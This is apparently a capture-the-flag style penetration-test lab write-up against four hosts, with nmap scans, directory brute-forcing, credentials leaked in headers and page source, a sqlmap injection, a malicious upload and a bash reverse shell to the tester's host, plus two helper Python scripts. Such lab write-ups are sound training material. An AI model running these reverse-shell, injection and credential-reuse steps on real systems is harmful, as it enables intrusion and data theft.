Black Box Test #2

You have been engaged in a Black-box Penetration Test (172.16.64.0/24 range). Your goal is to read the flag file on each machine.

Prework

Connect to VPN

sudo openvpn black-box-penetration-test-2.ovpn

Scan network

# Ping sweep the range (excluding our own VPN address), extract the live IPs from the
# report, then run a full TCP port scan with version/OS detection against them and
# convert the XML report into the tables shown below.
sudo nmap -sn 172.16.64.0/24 --exclude 172.16.64.10 -oN hostAlive.nmap &&
grep 'for' hostAlive.nmap | awk '{print $5}' > ips.txt &&
sudo nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml &&
nmap2md.sh portScan.xml | xclip
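The per-host tables in the Scanner section are what nmap2md.sh builds from portScan.xml. As an added example (not the page's nmap2md.sh, whose source is not shown), here is a small Python equivalent that reads nmap's -oX output and keeps only hosts that are up and ports that are open; the XML fragment embedded below is hand-constructed in that schema, not a real capture.

```python
import xml.etree.ElementTree as ET

# Constructed fragment in nmap's -oX schema (not a real scan capture).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="7.91">
  <host><status state="up"/>
    <address addr="172.16.64.81" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.2p2 Ubuntu 4ubuntu2.8"/></port>
      <port protocol="tcp" portid="25"><state state="filtered"/></port>
      <port protocol="tcp" portid="13306"><state state="open"/>
        <service name="mysql" product="MySQL" version="5.7.25-0ubuntu0.16.04.2"/></port>
    </ports>
    <os><osmatch name="Linux 3.16" accuracy="95"/></os>
  </host>
  <host><status state="down"/><address addr="172.16.64.5" addrtype="ipv4"/></host>
</nmaprun>"""

def parse_nmap_xml(xml_text):
    """Return {ip: {"os", "accuracy", "ports"}} for hosts that are up,
    keeping only open ports as (proto, port, service, version) tuples."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = host.find("address[@addrtype='ipv4']").get("addr")
        osmatch = host.find("os/osmatch")  # first osmatch is nmap's best guess
        ports = []
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # --open already drops these in the scan above; be safe anyway
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            version = " ".join(v for v in (svc.get("product"), svc.get("version"))
                               if v) if svc is not None else ""
            ports.append((port.get("protocol"), int(port.get("portid")), name, version))
        hosts[ip] = {"os": osmatch.get("name") if osmatch is not None else "unknown",
                     "accuracy": osmatch.get("accuracy", "") if osmatch is not None else "",
                     "ports": ports}
    return hosts

def render_table(hosts):
    """Markdown host table in the shape used by the Scanner section."""
    rows = ["| Host | OS | Accuracy | Open ports |", "|---|---|---|---|"]
    for ip, h in hosts.items():
        plist = ", ".join(f"{p}/{proto} {svc} {ver}".rstrip() for proto, p, svc, ver in h["ports"])
        rows.append(f"| {ip} | {h['os']} | {h['accuracy']}% | {plist} |")
    return "\n".join(rows)

if __name__ == "__main__":
    print(render_table(parse_nmap_xml(SAMPLE_XML)))
```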

Scanner

Generated on Mon Jul 12 18:49:14 2021 with nmap 7.91.

nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml

Hosts Alive (4)

+---------------+------------+----------+
| Host          | OS         | Accuracy |
+---------------+------------+----------+
| 172.16.64.81  | Linux 3.16 | 95%      |
| 172.16.64.91  | Linux 3.13 | 95%      |
| 172.16.64.92  | Linux 3.12 | 95%      |
| 172.16.64.166 | Linux 3.12 | 95%      |
+---------------+------------+----------+

Open Ports and Running Services

✔️172.16.64.81 (Linux 3.16 - 95%)

+-----------+-------+---------+---------------------------------+
| Port      | State | Service | Version                         |
+-----------+-------+---------+---------------------------------+
| 22/tcp    | open  | ssh     | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 |
| 80/tcp    | open  | http    | Apache httpd 2.4.18             |
| 13306/tcp | open  | mysql   | MySQL 5.7.25-0ubuntu0.16.04.2   |
+-----------+-------+---------+---------------------------------+

While inspecting sabrina's SSH account (ssh://sabrina:CHANGEME@172.16.64.166:222), we found the following hosts in a host.bak file!

172.16.64.81    cms.foocorp.io
172.16.64.81    static.foocorp.io
  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Dirbuster found the following route with potential credentials!

john1:password123
peter:youdonotguessthatone5

[Web] We get redirected when trying to log in with john1:password123, and we find that the application leaks database credentials in its response headers!

HTTP/1.1 302 Found
Date: Thu, 22 Jul 2021 23:05:39 GMT
Server: Apache/2.4.18 (Ubuntu)
X-DB-Key: x41x41x412019!
X-DB-User: root
X-DB-name: mysql
Location: 500.php
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

With the leaked credentials we connect directly to the exposed MySQL port (the password is quoted so the shell does not treat the trailing ! as history expansion):

mysql --host=172.16.64.81 \
      --user=root \
      --password='x41x41x412019!' \
      --port=13306 mysql

We find user credentials in the cmsbase.tbl_users table:

MySQL [cmsbase]> select user,password,name,email from tbl_users;
+---------+--------------------------------------------------------------+---------+-------------------+
| user    | password                                                     | name    | email             |
+---------+--------------------------------------------------------------+---------+-------------------+
| foocorp | $2a$08$f2fG8Ncpmj815xQ9U3Ylh.uD0VW/X6kOgjPIEHKP547jspS0FlHF6 | foocorp | admin@foocorp.io  |
| mickey  | $2a$08$w/oljwDbODAThUR4HTVO8eUjTabE80sH0i6xnOR97ZXfsGGmxohAW | mickey  | mickey@foocorp.io |
| donald  | $2a$08$dK04y0KEURxDv02vYRab1OMYMSWbW/bpGF.eAWrWv9JAGaa4yTxlq | donald  | donald@foocorp.io |
+---------+--------------------------------------------------------------+---------+-------------------+

Flag encountered! 😁

While inspecting database tables, we find our flag in the cmsbase.flag table.

select * from flag;
+----+------------------------------+
| id | content                      |
+----+------------------------------+
|  1 | Congratulations, you got it! |
+----+------------------------------+
1 row in set (0.141 sec)

✔️172.16.64.91 (Linux 3.13 - 95%)

+----------+-------+---------+-----------------------+
| Port     | State | Service | Version               |
+----------+-------+---------+-----------------------+
| 80/tcp   | open  | http    | Apache httpd 2.4.18   |
| 6379/tcp | open  | redis   | Redis key-value store |
+----------+-------+---------+-----------------------+

This machine's domain name is http://75ajvxi36vchsv584es1.foocorp.io/

That name should be added to the local /etc/hosts file, pointing at 172.16.64.91.

  • Target URL: http://172.16.64.91

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

A route to an app was discovered

Actions:

  • Fix upload form

  • Upload reverse shell

<!-- Save a local file with this updated code for the form.
     Notice the form action argument: it now points at the target's upload.php. -->
<html><body style="background: black; color: white;">
<script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
<center><div style="border: 1px yellow double">
<br /><br />
<form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php" method="post" enctype="multipart/form-data">
<br />Select file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload" name="submit">
</form>
<br /><br />
</div></center>
<hr /><br />
<center>&copy; FooCORP 2021</center>
</body></html>

Flag encountered through PHP reverse shell

$ cat flag.txt
Congratulations, you got this!
$ pwd
/var/www/html

✔️172.16.64.92 (Linux 3.12 - 95%)

+-----------+-------+---------+---------------------------------+
| Port      | State | Service | Version                         |
+-----------+-------+---------+---------------------------------+
| 22/tcp    | open  | ssh     | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 |
| 53/tcp    | open  | domain  | dnsmasq 2.75                    |
| 80/tcp    | open  | http    | Apache httpd 2.4.18             |
| 63306/tcp | open  | mysql   | MySQL 5.7.25-0ubuntu0.16.04.2   |
+-----------+-------+---------+---------------------------------+

  • Target URL: http://172.16.64.92

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Found a hidden URL while inspecting footracking.js

alert("Loaded!");
<!-- pre-login collect data -->
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
		console.log("OK");
	} else {
		console.log("Error!");
	}

	xhr.open("GET", "http://127.0.0.1/72ab311dcbfaa40ca0739f5daf505494/tracking2.php", true);
	xhr.send("ua=" + navigator.userAgent + "&platform=" + navigator.platform);
}

Finding the 72ab311dcbfaa40ca0739f5daf505494/tracking2.php URL suggests there is another hidden tracking.php (without the '2') in the same directory, which accepts an id URL parameter:

Actions:

  • Try sqlmap

  • Scan new found directory with Gobuster/Dirbuster

sqlmap -u 'http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=6' --dbs

Found credentials in the MySQL database via sqlmap (the two cracked MD5 values are shown in parentheses):

+----+-----+-------------------------------------------+-----------+
| id | adm | password                                  | username  |
+----+-----+-------------------------------------------+-----------+
| 1  | yes | c5d71f305bb017a66c5fa7fd66535b84          | fcadmin1  |
| 2  | yes | 14d69ee186f8d9bbeddd4da31559ce0f          | fcadmin2  |
| 3  | no  | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | tracking1 |
| 4  | no  | e10adc3949ba59abbe56e057f20f883e (123456) | tracking2 |
+----+-----+-------------------------------------------+-----------+

Not enough privileges when logging into 72ab311dcbfaa40ca0739f5daf505494/login.php with tracking1/12345

Found credentials in webpage's source code

view-source:http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/panel.php

<!-- = '127.0.0.1'; = 'dbuser'; = 'xXxyYyzZz789789)))'; = 'footracking'; = mysqli_connect(, , , );--><br />
dbuser
xXxyYyzZz789789)))
footracking

Actions:

  • Connect to new mysql database

  • Elevate privileges for tracking1 user

mysql --host=172.16.64.92 --user=dbuser --password='xXxyYyzZz789789)))' --port=63306

We now get into an Admin Console panel where we can inject PHP statements.

  • We start a listener locally with nc -lvnp 1234

  • We open a reverse shell to our machine (172.16.64.10) while listening locally on port 1234

exec("/bin/bash -c 'bash -i >& /dev/tcp/172.16.64.10/1234 0>&1'");

We find several long DNS names in /etc/hosts while inspecting the host through our reverse shell

  • This is the last machine's IP to pwn.

www-data@dns: $ cat /etc/hosts

...
127.0.0.1    0pm6duqbu2o8ajzkjeai.foocorp.io
127.0.0.1    ttpxbpp88fgt9r3292ag.foocorp.io
172.16.64.91    75ajvxi36vchsv584es1.foocorp.io
127.0.0.1    9fys6zpn5k03zt299wyj.foocorp.io
127.0.0.1    uvq8daoyiuq75znffwvy.foocorp.io
127.0.0.1    qv0jwarev2y4lq69xy9w.foocorp.io
127.0.0.1    h1z07t1pujg9ti677md0.foocorp.io
...

Flag encountered

We find the flag while inspecting the remote filesystem through our reverse shell:

www-data@dns:/var/www$ cat flag.txt
cat flag.txt
Congratulations! You got it.

✔️172.16.64.166 (Linux 3.12 - 95%)

+----------+-------+---------+---------------------------------+
| Port     | State | Service | Version                         |
+----------+-------+---------+---------------------------------+
| 2222/tcp | open  | ssh     | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 |
| 8080/tcp | open  | http    | Apache httpd 2.4.18             |
+----------+-------+---------+---------------------------------+

[SSH] Warning about password policy

Employees are requested to change their default CHANGEME password.

ssh admin@172.16.64.166 -p 2222
#################################################################
#       WARNING! This system is for authorized users only.      #
#       You activity is being actively monitored.               #
#       Any suspicious behavior will be resported.              #
#################################################################

~~~~ WORK IN PROGRESS ~~~~
Dear employee! Remember to change the default CHANGEME password ASAP.

admin@172.16.64.166's password: 
  • Target URL: http://172.16.64.166:8080

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

[Web] Found commented-out information about logged-in users in the website's markup!

wget http://172.16.64.166:8080/about-us.htm
xmllint --html about-us.htm --xpath '//comment()'
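Both leaks found on this engagement, the X-DB-* headers in the 302 response on 172.16.64.81 and the credentials left in HTML comments (what the xmllint --xpath '//comment()' step above pulls out), can be checked for in one pass over a raw response when reviewing an application's own output. This is an added example, not code from the original page: the sample reproduces the leaked headers from the 302 above, while the body and its comments are constructed.

```python
import re

# Constructed sample: header lines copied from the 302 response above,
# the HTML body and its comments are made up for this example.
SAMPLE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "X-DB-Key: x41x41x412019!\r\n"
    "X-DB-User: root\r\n"
    "X-DB-name: mysql\r\n"
    "Location: 500.php\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><body><!-- $dbpass = 'CHANGEME'; TODO remove before release -->"
    "<p>Redirecting</p><!-- footer --></body></html>"
)

# Words that suggest a header name or comment carries credentials.
SECRET_WORDS = re.compile(r"(key|pass|pwd|secret|token|user|db)", re.I)
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)

def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, {header: value}, body).
    Header names are lower-cased since HTTP headers are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def audit_response(raw):
    """Return [(where, finding), ...] for anything that looks like a leak:
    custom X- headers with secret-like names, and HTML comments mentioning them."""
    status, headers, body = split_response(raw)
    findings = []
    for name, value in headers.items():
        # Standard headers (Server, Location, ...) are not the concern here;
        # application-defined X- headers should never carry credentials.
        if name.startswith("x-") and SECRET_WORDS.search(name):
            findings.append(("header", f"{name}: {value}"))
    for comment in COMMENT_RE.findall(body):
        if SECRET_WORDS.search(comment):
            findings.append(("comment", comment.strip()))
    return findings

if __name__ == "__main__":
    for where, finding in audit_response(SAMPLE):
        print(f"[{where}] {finding}")
```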